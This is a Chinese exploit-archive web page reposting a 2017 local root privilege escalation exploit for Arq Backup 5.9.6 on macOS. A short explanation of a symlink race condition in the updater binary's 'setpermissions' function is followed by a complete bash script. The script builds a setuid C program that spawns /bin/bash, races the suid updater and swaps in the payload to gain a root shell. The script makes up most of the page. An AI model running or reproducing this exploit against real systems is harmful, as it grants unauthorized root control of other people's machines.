首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Arq 5.9.6 - Local root Privilege Escalation 来源：https://m4.rkw.io/blog.html 作者：Wadham 发布时间：2017-12-06   # Arq Backup from Haystack Software is a great application for backing up macs and # windows machines. Unfortunately versions of Arq for mac before 5.9.7 are # vulnerable to a local root privilege escalation exploit.   # The updater binary has a "setpermissions" function which sets the suid bit and # root ownership on itself but it suffers from a race condition that allows you to # swap the destination for these privileges using a symlink.   # We can exploit this to get +s and root ownership on any arbitrary binary.   # Other binaries in the application also suffer from the same issue.   # This was fixed in Arq 5.9.7.   # https://m4.rkw.io/arq_5.9.6.sh.txt # 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d # ------------------------------------------------------------------------------ #!/bin/bash   ################################################################## ###### Arq <= 5.9.6 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html                 #### ##################################################################   vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\ Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \ |grep root`   cwd="`pwd`"   if [ "$vuln" == "" ] ; then   echo "Not vulnerable - auto-updates not enabled."   exit 1 fi   cat > arq_596_exp.c <<EOF #include <unistd.h> int main() {   setuid(0);   seteuid(0);   execl(     "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",     NULL   );   return 0; } EOF   gcc -o arq_596_exp arq_596_exp.c rm -f arq_596_exp.c   ln -s /Applications/Arq.app/Contents/Library/LoginItems/\ Arq\ Agent.app/Contents/Resources/arq_updater   ./arq_updater setpermissions &>/dev/null& rm -f ./arq_updater mv arq_596_exp ./arq_updater   i=0 timeout=10   while : do   r=`ls -la ./arq_updater |grep root`   if [ "$r" != "" ] ; then     break   fi   sleep 0.1   i=$((i+1))   if [ $i -eq $timeout ] ; then     rm -f ./arq_updater     echo "Not vulnerable"     exit 1   fi done   ./arq_updater   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Murus 1.4.11 - Local root Priv ·Hashicorp vagrant-vmware-fusio ·Arq 5.9.7 - Local root Privile ·Hashicorp vagrant-vmware-fusio ·WinduCMS 3.1 - Local File Disc ·Sera 1.2 - Local root Privileg ·VX Search 10.2.14 - 'command_n ·Hashicorp vagrant-vmware-fusio ·Abyss Web Server < 2.11.6 - He ·Hashicorp vagrant-vmware-fusio ·Artica Web Proxy 3.06 - Remote ·Hashicorp vagrant-vmware-fusio   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved